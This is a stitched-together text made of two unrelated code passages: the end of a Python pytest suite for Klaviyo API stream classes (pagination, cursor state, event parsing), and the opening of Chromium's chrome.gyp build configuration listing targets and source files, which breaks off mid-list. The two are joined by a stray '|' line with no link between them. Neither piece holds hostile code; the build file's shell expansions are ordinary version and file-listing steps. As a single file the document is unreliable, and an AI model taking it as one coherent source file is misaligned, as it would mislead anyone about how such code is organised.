        stream = SomeStream(api_key="some_key")
        result = stream.parse_response(response)
        assert list(result) == response.json.return_value["data"]
class TestIncrementalKlaviyoStream:
    """Unit tests for IncrementalKlaviyoStream via the SomeIncrementalStream double."""

    def test_cursor_field_is_required(self):
        """The abstract base cannot be instantiated without cursor_field/path."""
        with pytest.raises(
            TypeError, match="Can't instantiate abstract class IncrementalKlaviyoStream with abstract methods cursor_field, path"
        ):
            IncrementalKlaviyoStream(api_key="some_key", start_date=START_DATE.isoformat())

    @pytest.mark.parametrize(
        ["next_page_token", "stream_state", "expected_params"],
        [
            # start with start_date
            (None, {}, {"api_key": "some_key", "count": 100, "sort": "asc", "since": START_DATE.int_timestamp}),
            # pagination overrule
            ({"since": 123}, {}, {"api_key": "some_key", "count": 100, "sort": "asc", "since": 123}),
            # start_date overrule state if state < start_date
            (
                None,
                {"updated_at": START_DATE.int_timestamp - 1},
                {"api_key": "some_key", "count": 100, "sort": "asc", "since": START_DATE.int_timestamp},
            ),
            # but pagination still overrule
            (
                {"since": 123},
                {"updated_at": START_DATE.int_timestamp - 1},
                {"api_key": "some_key", "count": 100, "sort": "asc", "since": 123},
            ),
            # and again
            (
                {"since": 123},
                {"updated_at": START_DATE.int_timestamp + 1},
                {"api_key": "some_key", "count": 100, "sort": "asc", "since": 123},
            ),
            # finally state > start_date and can be used
            (
                None,
                {"updated_at": START_DATE.int_timestamp + 1},
                {"api_key": "some_key", "count": 100, "sort": "asc", "since": START_DATE.int_timestamp + 1},
            ),
        ],
    )
    def test_request_params(self, next_page_token, stream_state, expected_params):
        """`since` resolves from start_date, stream state and pagination token, in priority order."""
        stream = SomeIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        result = stream.request_params(stream_state=stream_state, next_page_token=next_page_token)
        assert result == expected_params

    @pytest.mark.parametrize(
        ["current_state", "latest_record", "expected_state"],
        [
            ({}, {"updated_at": 10, "some_field": 100}, {"updated_at": 10}),
            ({"updated_at": 11}, {"updated_at": 10, "some_field": 100}, {"updated_at": 11}),
            ({"updated_at": 11}, {"updated_at": 12, "some_field": 100}, {"updated_at": 12}),
            (
                {"updated_at": 12},
                {"updated_at": "2021-04-03 17:15:12", "some_field": 100},
                {"updated_at": datetime.strptime("2021-04-03 17:15:12", "%Y-%m-%d %H:%M:%S").timestamp()},
            ),
        ],
    )
    def test_get_updated_state(self, current_state, latest_record, expected_state):
        """State keeps the max cursor; datetime strings are converted to timestamps."""
        stream = SomeIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        result = stream.get_updated_state(current_stream_state=current_state, latest_record=latest_record)
        assert result == expected_state

    @pytest.mark.parametrize(
        ["response_json", "next_page_token"],
        [
            ({"next": 10, "total": 110, "page": 9}, {"since": 10}),  # has next page
            ({"total": 110, "page": 9}, None),  # last page
        ],
    )
    def test_next_page_token(self, response, response_json, next_page_token):
        """Incremental pagination uses the response's `next` value as `since`."""
        response.json.return_value = response_json
        stream = SomeIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        result = stream.next_page_token(response)
        assert result == next_page_token
class TestReverseIncrementalKlaviyoStream:
    """Unit tests for ReverseIncrementalKlaviyoStream (reads newest-first once state exists)."""

    def test_cursor_field_is_required(self):
        """The abstract base cannot be instantiated without cursor_field/path."""
        with pytest.raises(
            TypeError,
            match="Can't instantiate abstract class ReverseIncrementalKlaviyoStream with abstract methods cursor_field, path",
        ):
            ReverseIncrementalKlaviyoStream(api_key="some_key", start_date=START_DATE.isoformat())

    def test_state_checkpoint_interval(self):
        """Checkpoint interval switches from per-page to end-only once state exists."""
        stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        assert stream.state_checkpoint_interval == stream.page_size, "reversed stream on the first read commit state for each page"
        stream.request_params(stream_state={"updated_at": START_DATE.isoformat()})
        assert stream.state_checkpoint_interval is None, "reversed stream should commit state only in the end"

    @pytest.mark.parametrize(
        ["next_page_token", "stream_state", "expected_params"],
        [
            (None, {}, {"api_key": "some_key", "count": 100, "sort": "asc"}),
            ({"page": 10}, {}, {"api_key": "some_key", "count": 100, "sort": "asc", "page": 10}),
            (None, {"updated_at": START_DATE.isoformat()}, {"api_key": "some_key", "count": 100, "sort": "desc"}),
            ({"page": 10}, {"updated_at": START_DATE.isoformat()}, {"api_key": "some_key", "count": 100, "sort": "desc", "page": 10}),
        ],
    )
    def test_request_params(self, next_page_token, stream_state, expected_params):
        """Sort order flips to descending once stream state exists."""
        stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        result = stream.request_params(stream_state=stream_state, next_page_token=next_page_token)
        assert result == expected_params

    @pytest.mark.parametrize(
        ["current_state", "latest_record", "expected_state"],
        [
            ({}, {"updated_at": "2021-01-02T12:13:14", "some_field": 100}, {"updated_at": "2021-01-02T12:13:14+00:00"}),
            (
                {"updated_at": "2021-02-03T13:14:15"},
                {"updated_at": "2021-01-02T12:13:14", "some_field": 100},
                {"updated_at": "2021-02-03T13:14:15+00:00"},
            ),
            (
                {"updated_at": "2021-02-03T13:14:15"},
                {"updated_at": "2021-03-04T14:15:16", "some_field": 100},
                {"updated_at": "2021-03-04T14:15:16+00:00"},
            ),
        ],
    )
    def test_get_updated_state(self, current_state, latest_record, expected_state):
        """State keeps the max cursor, normalized to an ISO string with UTC offset."""
        stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        result = stream.get_updated_state(current_stream_state=current_state, latest_record=latest_record)
        assert result == expected_state

    def test_next_page_token(self, response):
        """Pagination stops once a record older than the low boundary was seen."""
        ts_below_low_boundary = (START_DATE - pendulum.duration(hours=1)).isoformat()
        ts_above_low_boundary = (START_DATE + pendulum.duration(minutes=1)).isoformat()
        response.json.return_value = {
            "data": [{"updated_at": ts_below_low_boundary}, {"updated_at": ts_above_low_boundary}],
            "end": 108,
            "total": 110,
            "page": 9,
        }
        stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        stream.request_params(stream_state={"updated_at": ts_below_low_boundary})
        next(iter(stream.parse_response(response)))
        result = stream.next_page_token(response)
        assert result is None

    def test_parse_response_read_backward(self, response):
        """With state set (descending read), records stop at the low boundary."""
        ts_state = START_DATE + pendulum.duration(minutes=30)
        ts_below_low_boundary = (ts_state - pendulum.duration(hours=1)).isoformat()
        ts_above_low_boundary = (ts_state + pendulum.duration(minutes=1)).isoformat()
        response.json.return_value = {
            "data": [{"updated_at": ts_above_low_boundary}, {"updated_at": ts_above_low_boundary}, {"updated_at": ts_below_low_boundary}],
            "end": 108,
            "total": 110,
            "page": 9,
        }
        stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        stream.request_params(stream_state={"updated_at": ts_state.isoformat()})
        result = list(stream.parse_response(response))
        assert result == response.json.return_value["data"][:2], "should return all records until low boundary reached"

    def test_parse_response_read_forward(self, response):
        """Without state (ascending read), records older than start_date are skipped."""
        ts_below_low_boundary = (START_DATE - pendulum.duration(hours=1)).isoformat()
        ts_above_low_boundary = (START_DATE + pendulum.duration(minutes=1)).isoformat()
        response.json.return_value = {
            "data": [{"updated_at": ts_below_low_boundary}, {"updated_at": ts_below_low_boundary}, {"updated_at": ts_above_low_boundary}],
            "end": 108,
            "total": 110,
            "page": 9,
        }
        stream = SomeReverseIncrementalStream(api_key="some_key", start_date=START_DATE.isoformat())
        stream.request_params(stream_state={})
        result = list(stream.parse_response(response))
        assert result == response.json.return_value["data"][2:], "should all records younger then start_datetime"
class TestEventsStream:
    """Unit tests for the Events stream's record enrichment."""

    def test_parse_response(self, mocker):
        """Events get flow_id/flow_message_id lifted from $flow/$message and a campaign_id key."""
        stream = Events(api_key="some_key", start_date=START_DATE.isoformat())
        json = {
            "data": [
                {"event_properties": {"$flow": "ordinary", "$message": "hello"}, "some_key": "some_value"},
                {"event_properties": {"$flow": "advanced", "$message": "nice to meet you"}, "another_key": "another_value"},
            ]
        }
        records = list(stream.parse_response(mocker.Mock(json=mocker.Mock(return_value=json))))
        assert records == [
            {
                "campaign_id": None,
                "event_properties": {"$flow": "ordinary", "$message": "hello"},
                "flow_id": "ordinary",
                "flow_message_id": "hello",
                "some_key": "some_value",
            },
            {
                "another_key": "another_value",
                "campaign_id": None,
                "event_properties": {"$flow": "advanced", "$message": "nice to meet you"},
                "flow_id": "advanced",
                "flow_message_id": "nice to meet you",
            },
        ]
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
'pkg-config': 'pkg-config',
'variables': {
'version_py_path': 'tools/build/version.py',
'version_path': 'VERSION',
},
'version_py_path': '<(version_py_path)',
'version_path': '<(version_path)',
'version_full':
'<!(python <(version_py_path) -f <(version_path) -t "@MAJOR@.@MINOR@.@BUILD@.@PATCH@")',
'version_mac_dylib':
'<!(python <(version_py_path) -f <(version_path) -t "@BUILD@.@PATCH_HI@.@PATCH_LO@" -e "PATCH_HI=int(PATCH)/256" -e "PATCH_LO=int(PATCH)%256")',
# Define the common dependencies that contain all the actual
# Chromium functionality. This list gets pulled in below by
# the link of the actual chrome (or chromium) executable on
# Linux or Mac, and into chrome.dll on Windows.
'chromium_dependencies': [
'common',
'browser',
'profile_import',
'renderer',
'syncapi',
'utility',
'service',
'../content/content.gyp:content_gpu',
'../content/content.gyp:content_ppapi_plugin',
'../content/content.gyp:content_worker',
'../printing/printing.gyp:printing',
'../third_party/WebKit/Source/WebKit/chromium/WebKit.gyp:inspector_resources',
],
'nacl_win64_dependencies': [
'common_nacl_win64',
'common_constants_win64',
'installer_util_nacl_win64',
],
'allocator_target': '../base/allocator/allocator.gyp:allocator',
'grit_out_dir': '<(SHARED_INTERMEDIATE_DIR)/chrome',
'protoc_out_dir': '<(SHARED_INTERMEDIATE_DIR)/protoc_out',
'repack_locales_cmd': ['python', 'tools/build/repack_locales.py'],
# TODO: remove this helper when we have loops in GYP
'apply_locales_cmd': ['python', '<(DEPTH)/build/apply_locales.py'],
'conditions': [
['OS=="win"', {
'nacl_defines': [
'NACL_WINDOWS=1',
'NACL_LINUX=0',
'NACL_OSX=0',
],
'platform_locale_settings_grd':
'app/resources/locale_settings_win.grd',
},],
['OS=="linux"', {
'nacl_defines': [
'NACL_WINDOWS=0',
'NACL_LINUX=1',
'NACL_OSX=0',
],
'conditions': [
['chromeos==1', {
'platform_locale_settings_grd':
'app/resources/locale_settings_cros.grd',
}],
['chromeos!=1', {
'platform_locale_settings_grd':
'app/resources/locale_settings_linux.grd',
}],
],
},],
['OS=="mac"', {
'tweak_info_plist_path': 'tools/build/mac/tweak_info_plist',
'nacl_defines': [
'NACL_WINDOWS=0',
'NACL_LINUX=0',
'NACL_OSX=1',
],
'platform_locale_settings_grd':
'app/resources/locale_settings_mac.grd',
'conditions': [
['branding=="Chrome"', {
'mac_bundle_id': 'com.google.Chrome',
'mac_creator': 'rimZ',
# The policy .grd file also needs the bundle id.
'grit_defines': ['-D', 'mac_bundle_id=com.google.Chrome'],
}, { # else: branding!="Chrome"
'mac_bundle_id': 'org.chromium.Chromium',
'mac_creator': 'Cr24',
# The policy .grd file also needs the bundle id.
'grit_defines': ['-D', 'mac_bundle_id=org.chromium.Chromium'],
}], # branding
], # conditions
}], # OS=="mac"
['target_arch=="ia32"', {
'nacl_defines': [
# TODO(gregoryd): consider getting this from NaCl's common.gypi
'NACL_TARGET_SUBARCH=32',
'NACL_BUILD_SUBARCH=32',
],
}],
['target_arch=="x64"', {
'nacl_defines': [
# TODO(gregoryd): consider getting this from NaCl's common.gypi
'NACL_TARGET_SUBARCH=64',
'NACL_BUILD_SUBARCH=64',
],
}],
], # conditions
}, # variables
'includes': [
# Place some targets in gypi files to reduce contention on this file.
# By using an include, we keep everything in a single xcodeproj file.
    # Note on Win64 targets: targets that end with win64 should be used
    # on 64-bit Windows only. Targets that end with nacl_win64 should be used
# by Native Client only.
'app/policy/policy_templates.gypi',
'chrome_browser.gypi',
'chrome_common.gypi',
'chrome_dll.gypi',
'chrome_exe.gypi',
'chrome_installer.gypi',
'chrome_installer_util.gypi',
'chrome_renderer.gypi',
'chrome_tests.gypi',
'common_constants.gypi',
'nacl.gypi',
'preload.gypi',
],
'targets': [
{
# TODO(mark): It would be better if each static library that needed
# to run grit would list its own .grd files, but unfortunately some
# of the static libraries currently have circular dependencies among
# generated headers.
'target_name': 'chrome_resources',
'type': 'none',
'msvs_guid': 'B95AB527-F7DB-41E9-AD91-EB51EE0F56BE',
'actions': [
# Data resources.
{
'action_name': 'autofill_resources',
'variables': {
'grit_grd_file': 'browser/autofill/autofill_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'browser_resources',
'variables': {
'grit_grd_file': 'browser/browser_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'common_resources',
'variables': {
'grit_grd_file': 'common/common_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'renderer_resources',
'variables': {
'grit_grd_file': 'renderer/renderer_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
# TODO(mark): It would be better if each static library that needed
# to run grit would list its own .grd files, but unfortunately some
# of the static libraries currently have circular dependencies among
# generated headers.
'target_name': 'chrome_strings',
'msvs_guid': 'D9DDAF60-663F-49CC-90DC-3D08CC3D1B28',
'type': 'none',
'conditions': [
['OS=="win"', {
# HACK(nsylvain): We want to enforce a fake dependency on
          # installer_util_strings. install_util depends on both
          # chrome_strings and installer_util_strings, but for some reason
# Incredibuild does not enforce it (most likely a bug). By changing
# the type and making sure we depend on installer_util_strings, it
# will always get built before installer_util.
'type': 'dummy_executable',
'dependencies': ['installer_util_strings'],
}],
],
'actions': [
# Localizable resources.
{
'action_name': 'locale_settings',
'variables': {
'grit_grd_file': 'app/resources/locale_settings.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'chromium_strings.grd',
'variables': {
'grit_grd_file': 'app/chromium_strings.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'generated_resources',
'variables': {
'grit_grd_file': 'app/generated_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'google_chrome_strings',
'variables': {
'grit_grd_file': 'app/google_chrome_strings.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'theme_resources',
'type': 'none',
'msvs_guid' : 'A158FB0A-25E4-6523-6B5A-4BB294B73D31',
'actions': [
{
'action_name': 'theme_resources',
'variables': {
'grit_grd_file': 'app/theme/theme_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'platform_locale_settings',
'type': 'none',
'actions': [
{
'action_name': 'platform_locale_settings',
'variables': {
'grit_grd_file': '<(platform_locale_settings_grd)',
},
'includes': [ '../build/grit_action.gypi' ],
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'chrome_extra_resources',
'type': 'none',
'dependencies': [
'../third_party/WebKit/Source/WebKit/chromium/WebKit.gyp:generate_devtools_grd',
],
# These resources end up in resources.pak because they are resources
      # used by internal pages. Putting them in a separate pak file makes
# it easier for us to reference them internally.
'actions': [
{
'action_name': 'component_extension_resources',
'variables': {
'grit_grd_file': 'browser/resources/component_extension_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'net_internals_resources',
'variables': {
'grit_grd_file': 'browser/resources/net_internals_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'shared_resources',
'variables': {
'grit_grd_file': 'browser/resources/shared_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'sync_internals_resources',
'variables': {
'grit_grd_file': 'browser/resources/sync_internals_resources.grd',
},
'includes': [ '../build/grit_action.gypi' ],
},
{
'action_name': 'devtools_resources',
# This can't use ../build/grit_action.gypi because the grd file
          # is generated at build time, so the trick of using grit_info to get
# the real inputs/outputs at GYP time isn't possible.
'variables': {
'grit_cmd': ['python', '../tools/grit/grit.py'],
'grit_grd_file': '<(SHARED_INTERMEDIATE_DIR)/devtools/devtools_resources.grd',
},
'inputs': [
'<(grit_grd_file)',
],
'outputs': [
'<(grit_out_dir)/grit/devtools_resources.h',
'<(grit_out_dir)/devtools_resources.pak',
'<(grit_out_dir)/grit/devtools_resources_map.cc',
'<(grit_out_dir)/grit/devtools_resources_map.h',
],
'action': ['<@(grit_cmd)',
'-i', '<(grit_grd_file)', 'build',
'-o', '<(grit_out_dir)',
'-D', 'SHARED_INTERMEDIATE_DIR=<(SHARED_INTERMEDIATE_DIR)',
'<@(grit_defines)' ],
'message': 'Generating resources from <(grit_grd_file)',
},
],
'includes': [ '../build/grit_target.gypi' ],
},
{
'target_name': 'default_extensions',
'type': 'none',
'msvs_guid': 'DA9BAB64-91DC-419B-AFDE-6FF8C569E83A',
'conditions': [
['OS=="win"', {
'copies': [
{
'destination': '<(PRODUCT_DIR)/extensions',
'files': [
'browser/extensions/default_extensions/external_extensions.json'
]
}
],
}],
['OS=="linux" and chromeos==1 and branding=="Chrome"', {
'copies': [
{
'destination': '<(PRODUCT_DIR)/extensions',
'files': [
'>!@(ls browser/extensions/default_extensions/chromeos/cache/*)'
]
}
],
}],
],
},
{
'target_name': 'debugger',
'type': '<(library)',
'msvs_guid': '57823D8C-A317-4713-9125-2C91FDFD12D6',
'dependencies': [
'chrome_resources',
'chrome_strings',
'../net/net.gyp:http_server',
'theme_resources',
'../skia/skia.gyp:skia',
'../third_party/icu/icu.gyp:icui18n',
'../third_party/icu/icu.gyp:icuuc',
],
#Policy Management
'cflags': [
'<!@(<(pkg-config) --cflags-only-I libresource0)',
],
'include_dirs': [
'..',
],
'sources': [
'browser/debugger/browser_list_tabcontents_provider.cc',
'browser/debugger/browser_list_tabcontents_provider.h',
'browser/debugger/debugger_remote_service.cc',
'browser/debugger/debugger_remote_service.h',
'browser/debugger/devtools_client_host.cc',
'browser/debugger/devtools_client_host.h',
'browser/debugger/devtools_http_protocol_handler.cc',
'browser/debugger/devtools_http_protocol_handler.h',
'browser/debugger/devtools_manager.cc',
'browser/debugger/devtools_manager.h',
'browser/debugger/devtools_netlog_observer.cc',
'browser/debugger/devtools_netlog_observer.h',
'browser/debugger/devtools_protocol_handler.cc',
'browser/debugger/devtools_protocol_handler.h',
'browser/debugger/devtools_remote.h',
'browser/debugger/devtools_remote_listen_socket.cc',
'browser/debugger/devtools_remote_listen_socket.h',
'browser/debugger/devtools_remote_message.cc',
'browser/debugger/devtools_remote_message.h',
'browser/debugger/devtools_remote_service.cc',
'browser/debugger/devtools_remote_service.h',
'browser/debugger/devtools_handler.cc',
'browser/debugger/devtools_handler.h',
'browser/debugger/devtools_toggle_action.h',
'browser/debugger/devtools_window.cc',
'browser/debugger/devtools_window.h',
'browser/debugger/extension_ports_remote_service.cc',
'browser/debugger/extension_ports_remote_service.h',
'browser/debugger/inspectable_tab_proxy.cc',
'browser/debugger/inspectable_tab_proxy.h',
],
'conditions': [
['OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
}],
['OS=="linux" and meegotouch==1', {
'dependencies': [
'../build/linux/system.gyp:meegotouch',
],
}],
],
},
{
'target_name': 'utility',
'type': '<(library)',
'msvs_guid': '4D2B38E6-65FF-4F97-B88A-E441DF54EBF7',
'dependencies': [
'../base/base.gyp:base',
'../skia/skia.gyp:skia',
],
'sources': [
'utility/utility_main.cc',
'utility/utility_thread.cc',
'utility/utility_thread.h',
],
'include_dirs': [
'..',
],
'conditions': [
['OS=="linux"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
}],
],
},
{
'target_name': 'profile_import',
'type': '<(library)',
'dependencies': [
'../base/base.gyp:base',
],
'sources': [
'profile_import/profile_import_main.cc',
'profile_import/profile_import_thread.cc',
'profile_import/profile_import_thread.h',
],
},
{
# Provides a syncapi dynamic library target from checked-in binaries,
# or from compiling a stub implementation.
'target_name': 'syncapi',
'type': '<(library)',
'sources': [
'browser/sync/engine/http_post_provider_factory.h',
'browser/sync/engine/http_post_provider_interface.h',
'browser/sync/engine/syncapi.cc',
'browser/sync/engine/syncapi.h',
],
'include_dirs': [
'..',
],
'defines' : [
'_CRT_SECURE_NO_WARNINGS',
'_USE_32BIT_TIME_T',
],
'dependencies': [
'../base/base.gyp:base',
'../build/temp_gyp/googleurl.gyp:googleurl',
'../jingle/jingle.gyp:notifier',
'../third_party/icu/icu.gyp:icuuc',
'../third_party/sqlite/sqlite.gyp:sqlite',
'app/policy/cloud_policy_codegen.gyp:policy',
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
'common_constants',
'common_net',
'sync',
'sync_notifier',
],
'export_dependent_settings': [
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
'sync',
],
# This target exports a hard dependency because syncapi.h includes
# generated proto header files from sync_proto_cpp.
'hard_dependency': 1,
},
{
'target_name': 'sync',
'type': '<(library)',
'sources': [
'browser/sync/engine/all_status.cc',
'browser/sync/engine/all_status.h',
'browser/sync/engine/apply_updates_command.cc',
'browser/sync/engine/apply_updates_command.h',
'browser/sync/engine/build_and_process_conflict_sets_command.cc',
'browser/sync/engine/build_and_process_conflict_sets_command.h',
'browser/sync/engine/build_commit_command.cc',
'browser/sync/engine/build_commit_command.h',
'browser/sync/engine/change_reorder_buffer.cc',
'browser/sync/engine/change_reorder_buffer.h',
'browser/sync/engine/cleanup_disabled_types_command.cc',
'browser/sync/engine/cleanup_disabled_types_command.h',
'browser/sync/engine/clear_data_command.cc',
'browser/sync/engine/clear_data_command.h',
'browser/sync/engine/conflict_resolver.cc',
'browser/sync/engine/conflict_resolver.h',
'browser/sync/engine/download_updates_command.cc',
'browser/sync/engine/download_updates_command.h',
'browser/sync/engine/get_commit_ids_command.cc',
'browser/sync/engine/get_commit_ids_command.h',
'browser/sync/engine/idle_query_linux.cc',
'browser/sync/engine/idle_query_linux.h',
'browser/sync/engine/model_changing_syncer_command.cc',
'browser/sync/engine/model_changing_syncer_command.h',
'browser/sync/engine/model_safe_worker.cc',
'browser/sync/engine/model_safe_worker.h',
'browser/sync/engine/net/server_connection_manager.cc',
'browser/sync/engine/net/server_connection_manager.h',
'browser/sync/engine/net/syncapi_server_connection_manager.cc',
'browser/sync/engine/net/syncapi_server_connection_manager.h',
'browser/sync/engine/net/url_translator.cc',
'browser/sync/engine/net/url_translator.h',
'browser/sync/engine/nudge_source.h',
'browser/sync/engine/polling_constants.cc',
'browser/sync/engine/polling_constants.h',
'browser/sync/engine/post_commit_message_command.cc',
'browser/sync/engine/post_commit_message_command.h',
'browser/sync/engine/process_commit_response_command.cc',
'browser/sync/engine/process_commit_response_command.h',
'browser/sync/engine/process_updates_command.cc',
'browser/sync/engine/process_updates_command.h',
'browser/sync/engine/resolve_conflicts_command.cc',
'browser/sync/engine/resolve_conflicts_command.h',
'browser/sync/engine/store_timestamps_command.cc',
'browser/sync/engine/store_timestamps_command.h',
'browser/sync/engine/syncer.cc',
'browser/sync/engine/syncer.h',
'browser/sync/engine/syncer_command.cc',
'browser/sync/engine/syncer_command.h',
'browser/sync/engine/syncer_end_command.cc',
'browser/sync/engine/syncer_end_command.h',
'browser/sync/engine/syncer_proto_util.cc',
'browser/sync/engine/syncer_proto_util.h',
'browser/sync/engine/syncer_thread.cc',
'browser/sync/engine/syncer_thread.h',
'browser/sync/engine/syncer_types.cc',
'browser/sync/engine/syncer_types.h',
'browser/sync/engine/syncer_util.cc',
'browser/sync/engine/syncer_util.h',
'browser/sync/engine/syncproto.h',
'browser/sync/engine/update_applicator.cc',
'browser/sync/engine/update_applicator.h',
'browser/sync/engine/verify_updates_command.cc',
'browser/sync/engine/verify_updates_command.h',
'browser/sync/js_arg_list.cc',
'browser/sync/js_arg_list.h',
'browser/sync/js_backend.h',
'browser/sync/js_event_handler.h',
'browser/sync/js_event_handler_list.cc',
'browser/sync/js_event_handler_list.h',
'browser/sync/js_event_router.h',
'browser/sync/js_frontend.h',
'browser/sync/js_sync_manager_observer.cc',
'browser/sync/js_sync_manager_observer.h',
'browser/sync/protocol/proto_enum_conversions.cc',
'browser/sync/protocol/proto_enum_conversions.h',
'browser/sync/protocol/proto_value_conversions.cc',
'browser/sync/protocol/proto_value_conversions.h',
'browser/sync/protocol/service_constants.h',
'browser/sync/sessions/ordered_commit_set.cc',
'browser/sync/sessions/ordered_commit_set.h',
'browser/sync/sessions/session_state.cc',
'browser/sync/sessions/session_state.h',
'browser/sync/sessions/status_controller.cc',
'browser/sync/sessions/status_controller.h',
'browser/sync/sessions/sync_session.cc',
'browser/sync/sessions/sync_session.h',
'browser/sync/sessions/sync_session_context.cc',
'browser/sync/sessions/sync_session_context.h',
'browser/sync/syncable/autofill_migration.h',
'browser/sync/syncable/blob.h',
'browser/sync/syncable/dir_open_result.h',
'browser/sync/syncable/directory_backing_store.cc',
'browser/sync/syncable/directory_backing_store.h',
'browser/sync/syncable/directory_change_listener.h',
'browser/sync/syncable/directory_event.h',
'browser/sync/syncable/directory_manager.cc',
'browser/sync/syncable/directory_manager.h',
'browser/sync/syncable/model_type.cc',
'browser/sync/syncable/model_type.h',
'browser/sync/syncable/model_type_payload_map.cc',
'browser/sync/syncable/model_type_payload_map.h',
'browser/sync/syncable/nigori_util.cc',
'browser/sync/syncable/nigori_util.h',
'browser/sync/syncable/syncable-inl.h',
'browser/sync/syncable/syncable.cc',
'browser/sync/syncable/syncable.h',
'browser/sync/syncable/syncable_changes_version.h',
'browser/sync/syncable/syncable_columns.h',
'browser/sync/syncable/syncable_id.cc',
'browser/sync/syncable/syncable_id.h',
'browser/sync/syncable/syncable_enum_conversions.cc',
'browser/sync/syncable/syncable_enum_conversions.h',
'browser/sync/util/crypto_helpers.cc',
'browser/sync/util/crypto_helpers.h',
'browser/sync/util/cryptographer.cc',
'browser/sync/util/cryptographer.h',
'browser/sync/util/dbgq.h',
'browser/sync/util/extensions_activity_monitor.cc',
'browser/sync/util/extensions_activity_monitor.h',
'browser/sync/util/nigori.cc',
'browser/sync/util/nigori.h',
'browser/sync/util/user_settings.cc',
'browser/sync/util/user_settings.h',
'browser/sync/util/user_settings_posix.cc',
'browser/sync/util/user_settings_win.cc',
],
'include_dirs': [
'..',
],
'defines' : [
'SYNC_ENGINE_VERSION_STRING="Unknown"',
'_CRT_SECURE_NO_WARNINGS',
'_USE_32BIT_TIME_T',
],
'dependencies': [
'common',
'../base/base.gyp:base',
'../crypto/crypto.gyp:crypto',
'../skia/skia.gyp:skia',
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
],
'export_dependent_settings': [
'../base/base.gyp:base',
'../crypto/crypto.gyp:crypto',
'browser/sync/protocol/sync_proto.gyp:sync_proto_cpp',
],
# This target exports a hard dependency because its header files include
# protobuf header files from sync_proto_cpp.
'hard_dependency': 1,
'conditions': [
['OS=="win"', {
'sources' : [
'browser/sync/util/data_encryption.cc',
'browser/sync/util/data_encryption.h',
],
}],
['OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"', {
'dependencies': [
'../build/linux/system.gyp:gtk',
],
'link_settings': {
'libraries': [
'-lXss',
],
},
}],
['OS=="linux" and chromeos==1', {
'include_dirs': [
'<(grit_out_dir)',
],
}],
['OS=="mac"', {
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/IOKit.framework',
],
},
}],
],
},
# A library for sending and receiving server-issued notifications.
{
'target_name': 'sync_notifier',
'type': '<(library)',
'sources': [
'browser/sync/notifier/cache_invalidation_packet_handler.cc',
'browser/sync/notifier/cache_invalidation_packet_handler.h',
'browser/sync/notifier/chrome_invalidation_client.cc',
'browser/sync/notifier/chrome_invalidation_client.h',
'browser/sync/notifier/chrome_system_resources.cc',
'browser/sync/notifier/chrome_system_resources.h',
'browser/sync/notifier/invalidation_notifier.h',
'browser/sync/notifier/invalidation_notifier.cc',
'browser/sync/notifier/invalidation_util.cc',
'browser/sync/notifier/invalidation_util.h',
'browser/sync/notifier/non_blocking_invalidation_notifier.h',
'browser/sync/notifier/non_blocking_invalidation_notifier.cc',
'browser/sync/notifier/p2p_notifier.h',
'browser/sync/notifier/p2p_notifier.cc',
'browser/sync/notifier/registration_manager.cc',
'browser/sync/notifier/registration_manager.h',
'browser/sync/notifier/state_writer.h',
'browser/sync/notifier/sync_notifier.h',
'browser/sync/notifier/sync_notifier_factory.h',
'browser/sync/notifier/sync_notifier_factory.cc',
'browser/sync/notifier/sync_notifier_callback.h',
],
'include_dirs': [
'..',
],
'dependencies': [
'sync',
'../jingle/jingle.gyp:notifier',
'../third_party/cacheinvalidation/cacheinvalidation.gyp:cacheinvalidation',
],
# This target exports a hard dependency because it depends on
# cacheinvalidation (which itself has hard_dependency set).
'hard_dependency': 1,
'export_dependent_settings': [
'../jingle/jingle.gyp:notifier',
'../third_party/cacheinvalidation/cacheinvalidation.gyp:cacheinvalidation',
],
},
{
'target_name': 'service',
'type': '<(library)',
'msvs_guid': '2DA87614-55C5-4E56-A17E-0CD099786197',
'dependencies': [
'chrome_strings',
'common',
'common_net',
'../base/base.gyp:base',
'../jingle/jingle.gyp:notifier',
'../printing/printing.gyp:printing',
'../skia/skia.gyp:skia',
'../third_party/libjingle/libjingle.gyp:libjingle',
],
'sources': [
'service/service_child_process_host.cc',
'service/service_child_process_host.h',
'service/service_ipc_server.cc',
'service/service_ipc_server.h',
'service/service_main.cc',
'service/service_process.cc',
'service/service_process.h',
'service/service_process_prefs.cc',
'service/service_process_prefs.h',
'service/service_utility_process_host.cc',
